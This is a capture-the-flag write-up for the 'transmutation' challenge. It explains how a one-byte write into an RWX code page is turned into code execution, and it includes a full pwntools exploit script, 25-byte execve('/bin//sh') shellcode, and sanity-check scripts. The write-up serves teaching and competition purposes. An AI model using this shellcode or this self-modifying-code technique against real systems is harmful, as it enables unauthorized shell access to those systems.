transmutation
b01lersc
Task: 28-line C program exposing a single byte-write primitive into the first 73 bytes of chall(), whose page is mprotect'd RWX. Solution: patch the final ret to nop so chall falls through into main (creating an infinite write loop), neutralize the LEN bounds check by zeroing a jge displacement, plant execve shellcode after _fini, and flip one byte to transmute main's call chall into jmp short → trampoline → shellcode.
transmutation — b01lersc (BCTF 2026)
Description
To turn one program into another... is it even possible?
ncat --ssl transmutation.opus4-7.b01le.rs 8443
We are given a tiny C program (28 lines) together with its compiled binary (chall, no PIE, partial RELRO) and loader/libc. Each TCP connection spawns a fresh process, reads exactly two bytes (a value c and an offset i), and if i < LEN writes c into the function chall itself. The whole code page is made RWX beforehand. The goal is to execute code.
File list
| File | Purpose |
|---|---|
| chall.c | 28-line source of the binary (shown below) |
| chall | Compiled ELF, no PIE, partial RELRO |
| libc.so.6, ld-linux-x86-64.so.2 | Runtime libraries (unused by our exploit) |
| Dockerfile | Remote runs under pwn.red/jail (chroot, uid 1000, cwd /app) |
| flag.txt | Flag file at /app/flag.txt on the remote |
Source
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

#define MAIN ((char *)main)
#define CHALL ((char *)chall)
#define LEN (MAIN - CHALL)

int main(void);

void chall(void) {
    char c = getchar();
    unsigned char i = getchar();
    if (i < LEN) {
        CHALL[i] = c;
    }
}

int main(void) {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    mprotect((char *)((long)CHALL & ~0xfff), 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);

    chall();

    return 0;
}
Two properties jump out immediately:
- main calls chall exactly once. No loop. So a single TCP connection naively gives us one byte-write and then exit(0).
- LEN = main - chall = 0x49 (73 bytes). The bounds check restricts us to writing inside chall itself: we cannot write into main, _fini or anywhere else (initially).
If we want to win in one session, we have to turn that one write into many writes and extend our reach. This is the "transmutation."
Analysis
Reverse-engineering chall and main
0000000000401146 <chall>:
401146: 55 push rbp
401147: 48 89 e5 mov rbp, rsp
40114a: 48 83 ec 10 sub rsp, 0x10
40114e: e8 ed fe ff ff call 0x401040 <getchar@plt>
401153: 88 45 ff mov [rbp-1], al ; c
401156: e8 e5 fe ff ff call 0x401040 <getchar@plt>
40115b: 88 45 fe mov [rbp-2], al ; i
40115e: 0f b6 55 fe movzx edx, byte [rbp-2]
401162: 48 8d 05 26 00 00 00 lea rax, [rip+0x26] ; &main
401169: 48 8d 0d d6 ff ff ff lea rcx, [rip-0x2a] ; &chall
401170: 48 29 c8 sub rax, rcx ; LEN
401173: 48 39 c2 cmp rdx, rax
401176: 7d 14 jge 0x40118c ; <-- bounds check!
401178: 0f b6 45 fe movzx eax, byte [rbp-2]
40117c: 48 8d 15 c3 ff ff ff lea rdx, [rip-0x3d] ; &chall
401183: 48 01 c2 add rdx, rax
401186: 0f b6 45 ff movzx eax, byte [rbp-1]
40118a: 88 02 mov [rdx], al ; the WRITE
40118c: 90 nop
40118d: c9 leave
40118e: c3 ret ; <-- last byte of chall
000000000040118f <main>:
40118f: 55 push rbp
401190: 48 89 e5 mov rbp, rsp
... (three setbuf calls and the mprotect)
4011e9: e8 62 fe ff ff call mprotect
4011ee: e8 53 ff ff ff call 0x401146 <chall> ; <-- flip this!
4011f3: b8 00 00 00 00 mov eax, 0x0
4011f8: 5d pop rbp
4011f9: c3 ret
00000000004011fc <_fini>:
4011fc: 48 83 ec 08 sub rsp, 0x8
401200: 48 83 c4 08 add rsp, 0x8
401204: c3 ret
; 0x401205..0x401fff is zero-filled,
; still on the RWX page.
Memory layout of the RWX page (0x401000–0x401fff)
offset | code
---------------------------------------------------------------
chall+0x00 (0x401146) | chall() prologue
chall+0x30 (0x401176) | 7d 14 jge +0x14 <-- LEN check
chall+0x31 (0x401177) | ^ displacement byte we overwrite with 0x00
chall+0x48 (0x40118e) | c3 ret <-- patch to 0x90 (nop)
chall+0x49 (0x40118f) | ======== main() begins ========
chall+0xA8 (0x4011EE) | e8 53 ff ff ff call chall <-- flip 0xE8 -> 0xEB
chall+0xAD (0x4011F3) | main epilogue
chall+0xB6 (0x4011FC) | ======== _fini() ========
chall+0xBE (0x401204) | c3 ret (end of _fini)
chall+0xBF (0x401205) | 00 00 00 ... <-- 25-byte shellcode goes here
chall+0xFD (0x401243) | 00 00 <-- 2-byte trampoline `eb c0` here
All of this is inside the same RWX page (0x401000..0x401fff), so every address we touch is both writable and executable.
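The offset and address columns of the table can be cross-checked with a few lines of Python. This is only a sanity-check sketch: the addresses are the ones from the disassembly above, while the dictionary labels and constant names are our own and do not appear in the binary.

```python
# Sanity check of the layout table: every byte we patch is addressed by a
# one-byte offset from chall and lives on the single RWX page.
CHALL = 0x401146          # address of chall() from the disassembly
MAIN = 0x40118F           # address of main()
PAGE = CHALL & ~0xFFF     # page passed to mprotect (0x401000)
LEN = MAIN - CHALL        # bound enforced by the original check

# Hypothetical labels for the bytes the exploit touches.
targets = {
    "jge displacement": 0x401177,
    "ret of chall": 0x40118E,
    "call opcode in main": 0x4011EE,
    "shellcode start": 0x401205,
    "trampoline": 0x401243,
}

offsets = {name: addr - CHALL for name, addr in targets.items()}

for name, off in offsets.items():
    addr = CHALL + off
    assert 0 <= off <= 0xFF                  # fits in the unsigned char index i
    assert PAGE <= addr < PAGE + 0x1000      # same RWX page as chall
    reach = "before" if off < LEN else "only after"
    print(f"{name:20s} chall+{off:#04x} = {addr:#x}  writable {reach} the check is patched")
```

Only the first two entries have an offset below LEN, which is why they have to be the first two writes.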
Why a single write is not enough
The process reads exactly two bytes, performs one guarded write, then chall returns, main returns, and exit(0) is called. We never get a second chance. The only way to win in one connection is to modify chall so it keeps running — specifically, so that it keeps consuming pairs of bytes from stdin and keeps writing them.
Creating the infinite loop (the first "transmutation")
Look at the addresses around the end of chall:
40118e: c3 ret <-- chall's return
40118f: 55 push rbp <-- main's first byte
chall ends and main begins immediately after. If we replace the ret (0xc3) at offset 0x48 with 0x90 (nop), chall falls through into main. main runs its prologue, calls setbuf three times, calls mprotect (a harmless no-op the second time), and then calls chall again. chall reads two more bytes, writes one more byte, falls through into main again, and so on. Each pass leaves one unpopped return address and one saved rbp on the stack (16 bytes), which is negligible for the few dozen writes we need. We have converted one write into as many writes as we like at the cost of a single byte.
This is the punchline of the challenge name: by flipping one byte we have literally transmuted one program (a write-then-exit) into another (a write-loop).
Extending reach: neutralizing the bounds check
The loop alone is not enough — we can only touch offsets 0..0x48 inside chall, and there is nothing interesting to patch there except the things we already patched. We need to write into main (to hijack its call chall) and into the zero-padded region after _fini (for the shellcode).
The bounds check is:
401173: 48 39 c2 cmp rdx, rax
401176: 7d 14 jge +0x14 ; skip the write if i >= LEN
The jge takes a signed 8-bit displacement. Offset 0x31 in chall holds the displacement byte 0x14. Overwriting it with 0x00 turns the instruction into jge +0x00, which is functionally a nop regardless of flags — control simply falls through to the next instruction, which is the write. The check is now inert and i is effectively an unsigned byte that can index any offset 0..255 from chall. That range covers:
chall (offset 0x00..0x48)
main (offset 0x49..0xB5)
_fini (offset 0xB6..0xBE)
zeros (offset 0xBF..0xFF) ← writable & executable, perfect for shellcode
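As a quick check of the displacement arithmetic, the sketch below computes where the short branch lands before and after the patch. The helper name rel8_target is ours, and the instruction address is taken from the disassembly above.

```python
def rel8_target(insn_addr: int, disp_byte: int) -> int:
    """Target of a 2-byte short branch (opcode + rel8) located at insn_addr."""
    # rel8 is a signed byte, relative to the address of the next instruction.
    disp = disp_byte - 0x100 if disp_byte & 0x80 else disp_byte
    return insn_addr + 2 + disp

JGE_ADDR = 0x401176  # address of `7d 14` inside chall

original = rel8_target(JGE_ADDR, 0x14)  # taken branch skips the write
patched = rel8_target(JGE_ADDR, 0x00)   # taken branch lands on the next instruction

print(hex(original), hex(patched))
```

With the displacement zeroed, the taken and not-taken paths both continue at 0x401178, the first instruction of the write sequence.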
Planting the shellcode
25 bytes of classic execve("/bin//sh", ["/bin//sh", NULL], NULL) shellcode go at offset 0xBF (= 0x401205), which is in the zero-padded tail of the RWX page:
50                              push rax              ; NUL terminator: rax is 0 here, mprotect just returned 0
48 31 d2                        xor rdx, rdx          ; envp = NULL
48 bf 2f 62 69 6e 2f 2f 73 68   movabs rdi, "/bin//sh"
57                              push rdi              ; place string on stack
54 5f                           push rsp / pop rdi    ; rdi -> "/bin//sh"
52 57 54 5e                     push rdx / push rdi / push rsp / pop rsi   ; rsi -> [&str, NULL]
b0 3b                           mov al, 0x3b          ; sys_execve (upper bits of rax are still 0)
0f 05                           syscall
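The byte count and placement can be verified mechanically. The following sketch rebuilds the listing as a Python bytes object and checks the properties the exploit relies on; SC_OFF and TRAMP_OFF are the offsets used in this writeup, the other names are ours.

```python
import struct

# Rebuild the shellcode from the listing, one instruction group per line.
shellcode = (
    b"\x50"                      # push rax
    + b"\x48\x31\xd2"            # xor rdx, rdx
    + b"\x48\xbf" + b"/bin//sh"  # movabs rdi, imm64
    + b"\x57"                    # push rdi
    + b"\x54\x5f"                # push rsp ; pop rdi
    + b"\x52\x57\x54\x5e"        # push rdx ; push rdi ; push rsp ; pop rsi
    + b"\xb0\x3b"                # mov al, 0x3b
    + b"\x0f\x05"                # syscall
)

SC_OFF = 0xBF      # first shellcode byte, relative to chall
TRAMP_OFF = 0xFD   # trampoline offset, must not overlap the shellcode

# The movabs immediate starts after 1 + 3 + 2 bytes and is stored little-endian.
imm64 = struct.unpack_from("<Q", shellcode, 6)[0]
last_off = SC_OFF + len(shellcode) - 1

print(len(shellcode), hex(last_off), imm64.to_bytes(8, "little"))
```

The doubled slash in "/bin//sh" pads the path to exactly eight bytes, so it fills the 64-bit immediate without an embedded NUL.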
The call→jmp opcode flip (the second "transmutation")
Main calls chall at 0x4011EE:
4011ee: e8 53 ff ff ff call 0x401146 <chall>
The opcode e8 is "call rel32" with a 32-bit signed displacement 0xffffff53 (= -0xAD = jump back to chall).
The opcode eb is "jmp rel8": it takes a single signed byte as displacement, so the remaining three bytes of the old call are no longer part of the instruction. If we flip only the e8 byte to eb, the instruction becomes:
4011ee: eb 53 jmp short 0x401243
4011f0: ff ff ff (dead bytes, never decoded)
0x401243 is offset 0xFD in chall — inside the zero-padded region. We place a 2-byte trampoline there:
401243: eb c0 jmp short 0x401205 ; -0x40, into our shellcode
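Why the detour through a trampoline? jmp rel8 reaches -128..+127 bytes from the end of the instruction. From 0x4011F0 (the address after the jmp short) to the shellcode at 0x401205 is only +0x15, so a direct jmp +0x15 would be encodable. But that would mean changing two bytes in main (opcode and displacement) with a primitive that changes one byte per loop iteration, and main executes this instruction between every pair of writes. Writing the displacement first would leave a call rel32 with displacement 0xffffff15 (target 0x401108 instead of chall) for one iteration; writing the opcode first would jump to +0x53 immediately. The trampoline avoids the problem: we overwrite only the single byte e8 → eb and never touch the existing displacement 0x53.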
0x53 was already there as the low byte of the call displacement; it happens to point to 0x401243, which is a convenient "landing pad" address to hide our trampoline in. That the existing displacement byte lines up so nicely with a reachable free spot is the elegance of the whole trick.
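To make the reinterpretation concrete, the sketch below decodes the same five bytes once as call rel32 and once as jmp rel8, then follows the trampoline. It handles only the two encodings discussed here; branch_target is a helper name of our own, not part of any library.

```python
import struct

SITE = 0x4011EE                          # address of the 5-byte call in main
original = bytes.fromhex("e853ffffff")   # call chall
patched = bytes([0xEB]) + original[1:]   # only the opcode byte changes

def branch_target(addr: int, insn: bytes) -> int:
    """Decode e8 rel32 (call) or eb rel8 (jmp short) located at addr."""
    if insn[0] == 0xE8:
        (disp,) = struct.unpack_from("<i", insn, 1)   # signed 32-bit
        return addr + 5 + disp
    if insn[0] == 0xEB:
        (disp,) = struct.unpack_from("<b", insn, 1)   # signed 8-bit
        return addr + 2 + disp
    raise ValueError("not an e8/eb branch")

call_target = branch_target(SITE, original)                      # chall
jmp_target = branch_target(SITE, patched)                        # landing pad
tramp_target = branch_target(jmp_target, bytes.fromhex("ebc0"))  # shellcode

print(hex(call_target), hex(jmp_target), hex(tramp_target))
```

The byte 0x53 is read as part of a negative 32-bit displacement in the first case and as a positive 8-bit displacement in the second, which is what sends control forward into the zero-filled tail instead of back to chall.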
Order of operations matters
- Write ret → nop first (offset 0x48). Until this happens we only get one write per process.
- Neutralize the LEN check (offset 0x31) before writing anywhere ≥ 0x49, otherwise those writes are silently discarded.
- Plant shellcode and trampoline (offsets 0xBF…0xD7, then 0xFD/0xFE) while main still loops calmly via call chall.
- Flip call → jmp (offset 0xA8) as the final step. The very next iteration of main runs jmp short +0x53 → trampoline → shellcode, and we drop into /bin/sh.
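The ordering constraints can be illustrated with a toy model of the target. This is a deliberately simplified sketch, not an emulator: it tracks only the three patched bytes with the exact values used in this writeup, and the function and variable names are hypothetical.

```python
LEN = 0x49

def simulate(pairs):
    """Toy model of the target. Returns (memory, number of writes that landed)."""
    mem = bytearray(0x100)   # chall+0x00 .. chall+0xFF, unmodelled bytes left as 0
    mem[0x31] = 0x14         # jge displacement
    mem[0x48] = 0xC3         # ret
    mem[0xA8] = 0xE8         # call opcode
    landed = 0
    for value, off in pairs:
        check_active = mem[0x31] == 0x14
        if not (check_active and off >= LEN):
            mem[off] = value
            landed += 1
        if mem[0x48] != 0x90:   # chall still returns, so the process exits
            break
        if mem[0xA8] == 0xEB:   # main jumps away instead of calling chall
            break
    return mem, landed

shellcode = bytes.fromhex("504831d248bf2f62696e2f2f736857545f5257545eb03b0f05")
good = [(0x90, 0x48), (0x00, 0x31)]
good += [(b, 0xBF + k) for k, b in enumerate(shellcode)]
good += [(0xEB, 0xFD), (0xC0, 0xFE), (0xEB, 0xA8)]

# Two wrong orders: check patched before the loop exists, and check patched
# only after the shellcode has already been sent.
no_loop = [good[1], good[0]] + good[2:]
late_check = [good[0]] + good[2:27] + [good[1]] + good[27:]

mem_good, n_good = simulate(good)
_, n_no_loop = simulate(no_loop)
mem_late, n_late = simulate(late_check)

payload = b"".join(bytes([v, o]) for v, o in good)
print(n_good, n_no_loop, n_late, len(payload))
```

In the model the correct order lands every write, the first wrong order stops after a single write, and the second one silently loses all 25 shellcode bytes.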
Solution
Each "write" consumes exactly two bytes on stdin: (value, offset). The full exploit is simply a scripted sequence of 30 such pairs (1 + 1 + 25 + 2 + 1).
#!/usr/bin/env python3
"""
transmutation - b01lersc

Single-byte write primitive into the first 0x49 bytes of chall().
The chall page is mprotect'd RWX, so we can self-modify code.

Chain:
  1. ret -> nop at chall+0x48 (chall falls through into main -> infinite loop)
  2. jge +0x14 -> jge +0x00 at chall+0x31 (LEN bounds check becomes a no-op)
  3. Write 25-byte execve("/bin//sh") shellcode at chall+0xBF (=0x401205)
  4. Place 2-byte trampoline `eb c0` at chall+0xFD (=0x401243), jumps to 0x401205
  5. Flip main's `call chall` (e8 53 ff ff ff) to `jmp short +0x53` (eb 53 ff ff ff)
     -> trampoline -> shellcode -> /bin/sh
"""
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

HOST = 'transmutation.opus4-7.b01le.rs'
PORT = 8443

# execve("/bin//sh", ["/bin//sh", NULL], NULL), 25 bytes
shellcode = bytes([
    0x50,                                       # push rax
    0x48, 0x31, 0xd2,                           # xor rdx, rdx
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,
    0x2f, 0x2f, 0x73, 0x68,                     # movabs rdi, "/bin//sh"
    0x57,                                       # push rdi
    0x54, 0x5f,                                 # push rsp ; pop rdi
    0x52, 0x57, 0x54, 0x5e,                     # push rdx ; push rdi
                                                # push rsp ; pop rsi
    0xb0, 0x3b,                                 # mov al, 0x3b (sys_execve)
    0x0f, 0x05,                                 # syscall
])
assert len(shellcode) == 25

SC_OFF = 0xBF      # shellcode offset (= 0x401205)
TRAMP_OFF = 0xFD   # trampoline offset (= 0x401243)
CALL_OFF = 0xA8    # offset of `call chall` opcode byte in main (= 0x4011EE)


def write_byte(io, c: int, i: int):
    """Ask chall() to write byte c at chall[i]."""
    io.send(bytes([c & 0xff, i & 0xff]))


def pwn(io):
    # 1. ret -> nop => main keeps calling chall forever
    write_byte(io, 0x90, 0x48)

    # 2. jge +0x14 -> jge +0x00 => LEN check bypassed
    write_byte(io, 0x00, 0x31)

    # 3. drop shellcode into the zero-padded area after _fini
    for k, b in enumerate(shellcode):
        write_byte(io, b, SC_OFF + k)

    # 4. trampoline `eb c0` at chall+0xFD -> jumps -0x40 into shellcode
    write_byte(io, 0xEB, TRAMP_OFF)
    write_byte(io, 0xC0, TRAMP_OFF + 1)

    # 5. transmute `call chall` (e8 ..) into `jmp short +0x53` (eb ..)
    write_byte(io, 0xEB, CALL_OFF)
    # next main iteration executes our shellcode


if __name__ == '__main__':
    import sys, time

    if len(sys.argv) > 1 and sys.argv[1] == 'local':
        io = process('./chall')
    else:
        io = remote(HOST, PORT, ssl=True)

    pwn(io)
    io.sendline(b'cat /app/flag.txt; exit')
    time.sleep(2)
    print(io.recvall(timeout=5).decode(errors='replace'))
Running against the remote:
$ python3 exploit.py
[+] Opening connection to transmutation.opus4-7.b01le.rs on port 8443: Done
bctf{CPU_0pt1m1z3r5_H4T3_th15_0n3_51mp13_tr1ck_5519225335}
A note on self-modifying code and CPU pipelines
The challenge flag — "CPU optimizers hate this one simple trick" — is a nod to the fact that on x86/x86-64, self-modifying code does take effect even for instructions very close to the one currently executing, because the architecture is specified to snoop stores against the prefetch/decode queue and invalidate it. That is an unusually strong guarantee compared with most RISC ISAs (ARM/RISC-V require explicit cache flushes and isb/fence.i). It is exactly what lets us patch main's call chall a few bytes before it is fetched and have the CPU honour the new opcode on the very next iteration.
The second "simple trick" is the call rel32 → jmp rel8 flip: identical first-byte slot in the encoding, identical length at the call site (both are 5 bytes on disk — jmp rel8 is 2 bytes but the remaining 3 bytes are simply unreachable), and a reusable displacement byte that points to a convenient cave. One byte changes, the instruction means something completely different.